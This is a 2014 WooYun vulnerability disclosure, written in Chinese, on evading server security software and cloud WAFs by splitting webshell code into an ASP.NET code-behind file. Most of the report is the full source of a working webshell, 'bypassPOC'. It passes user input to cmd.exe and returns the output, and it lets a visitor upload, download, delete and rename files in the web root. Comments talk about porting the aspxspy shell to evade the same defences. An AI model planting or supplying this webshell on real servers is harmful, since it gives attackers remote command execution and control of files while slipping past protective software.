当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-065023

漏洞标题:一种姿势一种shell写法服务器安全软件和云防均无法发挥正常效果

相关厂商:cncert国家互联网应急中心

漏洞作者: abcdlzy

提交时间:2014-06-15 15:18

修复时间:2014-09-13 15:20

公开时间:2014-09-13 15:20

漏洞类型:设计错误/逻辑缺陷

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-15: 细节已通知厂商并且等待厂商处理中
2014-06-18: 厂商已经确认,细节仅向厂商公开
2014-06-21: 细节向第三方安全合作伙伴开放
2014-08-12: 细节向核心白帽子及相关领域专家公开
2014-08-22: 细节向普通白帽子公开
2014-09-01: 细节向实习白帽子公开
2014-09-13: 细节向公众公开

简要描述:

这个方法建立在基于存在各种姿势可能存在的上传漏洞的基础上,被拦截后如何绕过安全防护进行部分或全部操作

详细说明:

目前java没进行测试,这个猜测未经验证:可能javaweb可以把shell的代码写进jar包中,进行调用执行,不太熟悉java...应该这个是同.net引用dll代码.
发现只要把shell代码分离出页面,安全软件不能立即发现,只能规则性禁用调用系统本身的API,如果系统API有权限执行,将可以任意命令执行

漏洞证明:

正常如果能传shell上去的话比如站里面装了狗,是会被狗查出来拦截的

1.png


自己写的shell可以执行

2.png


命令执行被狗拦了,这个我没办法绕过

3.png


去测试下云防御
然后手头上我只有一个自己用来搞实验的玉米,没有VPS什么的,于是去某网申请了个测试的

4.png


绑定安全宝,加速乐想试,但是我发现我这玉米加速乐不给我绑

5.png


测试下生效没

6.png


把自己写的和aspxspy马传上去,最后发现aspxspy被干掉了...

7.png


还能用,不错

8.png


可惜被服务器上面安全软件拒绝执行了,但是云防没反应,要不谁借个虚拟主机给试下?

9.png


贴下源码,那个文件管理懒得写,是在csdn上面随便down了个的.
bypassPOC.aspx

<%@ Page Language="C#" AutoEventWireup="true" CodeBehind="bypassPOC.aspx.cs" Inherits="bypassPOC.Default" %>
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title></title>
</head>
<body>
<form id="form1" runat="server">
<div>

<asp:TextBox ID="tb" runat="server"></asp:TextBox>
<br />
<asp:Button ID="Button1" runat="server" OnClick="Button1_Click" Text="Button" />

<br />

</div>
<div>
<asp:DropDownList ID="DropDownList1" runat="server" Width="200px" AutoPostBack="True" OnSelectedIndexChanged="DropDownList1_SelectedIndexChanged">
<asp:ListItem Value="-1">选择功能</asp:ListItem>
<asp:ListItem Value="0">上传限制</asp:ListItem>
<asp:ListItem Value="1">上传文件</asp:ListItem>
<asp:ListItem Value="2">管理文件</asp:ListItem>
</asp:DropDownList>
<asp:Label ID="lbl_FolderInfo" runat="server"></asp:Label><br />
<asp:MultiView ID="MultiView1" runat="server">
<!--上传限制界面开始-->
<asp:View ID="view_Configure" runat="server">
允许上传文件的类型:
<asp:BulletedList ID="bl_TileTypeLimit" runat="server">
</asp:BulletedList>
允许上传单个文件的大小:
<asp:Label ID="lab_FileSizeLimit" runat="server" Text=""></asp:Label>
</asp:View>
<asp:View ID="view_Upload" runat="server">
<asp:FileUpload ID="FileUpload" runat="server" Width="400"/><br />
<asp:Button ID="btn_Upload" runat="server" Text="上传文件" OnClick="btn_Upload_Click" />
</asp:View>
<!--管理文件开始-->
<asp:View ID="view_Manage" runat="server">
<table cellpadding="5" cellspacing="0" border="0">
<tr>
<td>
<!--启用了AutoPostBack-->
<asp:ListBox ID="lb_FileList" runat="server" AutoPostBack="True" Height="300px" Width="300px" OnSelectedIndexChanged="lb_FileList_SelectedIndexChanged"></asp:ListBox></td>
<td valign="top">
<asp:Label ID="lbl_FileDescription" runat="server"></asp:Label></td>
</tr>
</table>
<asp:Button ID="btn_DownLoad" runat="server" Text="下载文件" OnClick="btn_DownLoad_Click" />
<!--在删除前给予确定-->
<asp:Button ID="btn_Delete" runat="server" Text="删除文件" OnClientClick="return confirm('确定删除文件!')" OnClick="btn_Delete_Click" /><br />
<asp:TextBox ID="tb_FileNewName" runat="server" Width="300px"></asp:TextBox>
<asp:Button ID="btn_Rename" runat="server" Text="对文件重命名" OnClick="btn_Rename_Click" />
</asp:View>
</asp:MultiView>
</div>
</form>
</body>
</html>


bypassPOC.aspx.cs

using System;
using System.IO;
using System.IO.Compression;
using System.Diagnostics;
using System.Data;
using System.Data.OleDb;
using System.Data.Common;
using System.Data.SqlClient;
using Microsoft.Win32;
using System.Net;
using System.Net.Sockets;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text.RegularExpressions;
using System.Security;
using System.Security.Permissions;
using System.Threading;
using System.Web;
using System.Web.UI.WebControls;
namespace bypassPOC
{
public partial class Default : System.Web.UI.Page
{
protected void Page_Load(object sender, EventArgs e)
{
if (!Page.IsPostBack)
{
//初始化文件夹信息
InitFolderInfo();
//初始化列表框控件文件列表信息
InitFileList();
}
}
protected void Button1_Click(object sender, EventArgs e)
{
string text = this.tb.Text;
Process process = new Process
{
StartInfo = { FileName = "cmd.exe", UseShellExecute = false, RedirectStandardInput = true, RedirectStandardOutput = true, RedirectStandardError = true, CreateNoWindow = true }
};
string s = null;
process.Start();
process.StandardInput.WriteLine(text);
process.StandardInput.WriteLine("exit");
s = process.StandardOutput.ReadToEnd();
process.WaitForExit();
process.Close();
base.Response.Write("<pre>");
base.Response.Write(base.Server.HtmlEncode(s));
base.Response.Write("</pre>");
}
#region 初始化文件夹信息
private void InitFolderInfo()
{
//从config中读取文件上传路径
string strFileUpladPath = "/";
//如果上传文件夹不存在,则根据config创建一个
if (!Directory.Exists(Server.MapPath(strFileUpladPath)))
{
Directory.CreateDirectory(Server.MapPath(strFileUpladPath));
}
//将虚拟路径转换为物理路径
string strFilePath = Server.MapPath(strFileUpladPath);
//从config里读取文件夹容量限制
double iFolderSizeLimit = 102400;
//声明文件夹已经使用的容量
double iFolderCurrentSize = 0;
//获取文件夹中的所有文件
FileInfo[] arrFiles = new DirectoryInfo(strFilePath).GetFiles();
//循环文件获已经使用的容量
foreach (FileInfo fi in arrFiles)
{
iFolderCurrentSize += Convert.ToInt32(fi.Length / 1024);
}
#region 第二种获得文件夹使用大小的方法
//DirectoryInfo dir = new DirectoryInfo(strFilePath);
//foreach (FileSystemInfo fi in dir.GetFileSystemInfos())
//{
// FileInfo finf = new FileInfo(fi.FullName);
// iFolderCurrentSize += Convert.ToInt32(finf.Length / 1024);
//}
#endregion
//把文件夹容量和以用文件夹容量赋值给标签
lbl_FolderInfo.Text = string.Format("文件夹容量限制:{0}M,已用容量:{1}KB", iFolderSizeLimit / 1024, iFolderCurrentSize);
}
#endregion
#region 初始化列表框控件文件列表信息
private void InitFileList()
{
//从config中获取文件上传路径
string strFileUpladPath = "/";
//将虚拟路径转换为物理路径
string strFilePath = Server.MapPath(strFileUpladPath);
//读取上传文件夹下所有文件
FileInfo[] arrFile = new DirectoryInfo(strFilePath).GetFiles();
//把文件名逐一添加到列表框控件
foreach (FileInfo fi in arrFile)
{
lb_FileList.Items.Add(fi.Name);
}
}
#endregion
#region 判断文件大小限制
private bool IsAllowableFileSize()
{
//从web.config读取判断文件大小的限制
double iFileSizeLimit = 102400 * 1024;
//判断文件是否超出了限制
if (iFileSizeLimit > FileUpload.PostedFile.ContentLength)
{
return true;
}
else
{
return false;
}
}
#endregion
#region 弹出警告消息
protected void ShowMessageBox(string strMessage)
{
Response.Write(string.Format("<script>alert('{0}')</script>", strMessage));
}
#endregion
#region 上传文件按钮事件
protected void btn_Upload_Click(object sender, EventArgs e)
{
//判断用户是否选择了文件
if (FileUpload.HasFile)
{
//判断文件大小是否符合
if (IsAllowableFileSize())
{
//从web.config中读取上传路径
string strFileUploadPath = "/";
//从UploadFile控件中读取文件名
string strFileName = FileUpload.FileName;
//组合成物理路径
string strFilePhysicalPath = Server.MapPath(strFileUploadPath + "/") + strFileName;
//判断文件是否存在
if (!File.Exists(strFilePhysicalPath))
{
//保存文件
FileUpload.SaveAs(strFilePhysicalPath);
//更新列表框
lb_FileList.Items.Add(strFileName);
//更新文件夹信息
InitFolderInfo();
ShowMessageBox("上传成功!");
}
else
{
ShowMessageBox("文件已经存在!");
}
}
else
{
ShowMessageBox("文件大小不符合要求!");
}
}
}
#endregion
#region 列表框事件
protected void lb_FileList_SelectedIndexChanged(object sender, EventArgs e)
{
//从config中读取文件上传路径
string strFileUpladPath = "/";
//从列表框中读取选择的文件名
string strFileName = lb_FileList.SelectedValue;
//组合成物理路径
string strFilePhysicalPath = Server.MapPath(strFileUpladPath + "/") + strFileName;
//根据物理路径实例化文件信息类
FileInfo fi = new FileInfo(strFilePhysicalPath);
//或得文件大小和创建日期赋值给标签
lbl_FileDescription.Text = string.Format("文件大小:{0}字节<br><br>上传时间:{1}<br>", fi.Length, fi.CreationTime);
//把文件名赋值给重命名文件框
tb_FileNewName.Text = strFileName;
}
#endregion
#region 下载文件按钮事件
protected void btn_DownLoad_Click(object sender, EventArgs e)
{
//从web.config读取文件上传路径
string strFileUploadPath = "";
//从列表框中读取选择的文件
string strFileName = lb_FileList.SelectedValue;
//组合成物理路径
string FullFileName = Server.MapPath(strFileUploadPath + "/") + strFileName;
FileInfo DownloadFile = new FileInfo(FullFileName);
Response.Clear();
Response.ClearHeaders();
Response.Buffer = false;
Response.ContentType = "application/octet-stream ";
Response.AppendHeader("Content-Disposition ", "attachment;filename= "
+ HttpUtility.UrlEncode(DownloadFile.FullName, System.Text.Encoding.UTF8));
Response.AppendHeader("Content-Length ", DownloadFile.Length.ToString());
Response.WriteFile(DownloadFile.FullName);
Response.Flush();
Response.End();
}
#endregion
#region 删除文件
protected void btn_Delete_Click(object sender, EventArgs e)
{
//从config中读取文件上传路径
string strFileUpladPath = "/";
//从列表框中读取选择的文件名
string strFileName = lb_FileList.SelectedValue;
//组合成物理路径
string strFilePhysicalPath = Server.MapPath(strFileUpladPath + "/") + strFileName;
//删除文件
System.IO.File.Delete(strFilePhysicalPath);
//更新文件列表框控件
lb_FileList.Items.Remove(lb_FileList.Items.FindByText(strFileName));
//更新文件夹信息
InitFolderInfo();
//更新文件描述信息
tb_FileNewName.Text = "";
//更新重命名文本框
lbl_FileDescription.Text = "";
//调用自定义消息提示
ShowMessageBox("删除成功!");
}
#endregion
#region 重命名文件
protected void btn_Rename_Click(object sender, EventArgs e)
{
//从web.config中读取文件上传路径
string strFileUpladPath = "/";
//从列表框中控件中读取选择的文件名
string strFileName = lb_FileList.SelectedValue;
//重命名文本框或得选择的文件名
string strFileNewName = tb_FileNewName.Text;
//组合成物理路径
string strFilePhysicalPath = Server.MapPath(strFileUpladPath + "/") + strFileName;
//组合成新物理路径
string strFileNewPhysicalPath = Server.MapPath(strFileUpladPath + "/") + strFileNewName;
//文件重命名,即获取新地址覆盖旧地址的过程
System.IO.File.Move(strFilePhysicalPath, strFileNewPhysicalPath);
//找到文件列表的匹配项
ListItem li = lb_FileList.Items.FindByText(strFileName);
//修改文字
li.Text = strFileNewName;
//修改值
li.Value = strFileNewName;
//调用自定义方法现实
ShowMessageBox("文件覆盖成功!");
}
#endregion
#region 下拉列表事件
protected void DropDownList1_SelectedIndexChanged(object sender, EventArgs e)
{
MultiView1.ActiveViewIndex = Convert.ToInt32(DropDownList1.SelectedValue);
}
#endregion
}
}

修复方案:

能雷劈下么?

版权声明:转载请注明来源 abcdlzy@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-06-18 21:17

厂商回复:

CNVD未能全部测试,已经直接转报给加速乐、360网站卫士和安全宝三个主要的防护产品厂商。供其参考,后续待自然公开。鼓励此类独立思考的风险分析。

最新状态:

暂无


漏洞评价:

评论

  1. 2014-06-15 15:53 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号,不装逼了,再见孩子们。by Mosua...)

    呵呵,不加精应该不是什么厉害的绕过,@xsser 对吗?

  2. 2014-06-15 15:59 | abcdlzy ( 实习白帽子 | Rank:79 漏洞数:14 | 好好学习,天天向上。)

    aspxspy这类大马根据原理全部移植目测绕过也是可以的,需要点时间去重写测试.

  3. 2014-06-15 16:59 | abcdlzy ( 实习白帽子 | Rank:79 漏洞数:14 | 好好学习,天天向上。)

    实验成功,可以跑aspxspy的马儿.狗狗不拦,云的话....万网把我虚拟主机封了.手头没东西去测试了

  4. 2014-06-15 19:38 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    关注

  5. 2014-09-14 00:37 | Bird ( 实习白帽子 | Rank:60 漏洞数:25 | Stay hungry. Stay foolish.)

    普遍的安全狗绕过方法不是include另一文件么?好像差不多- - 我承认我没看懂。。。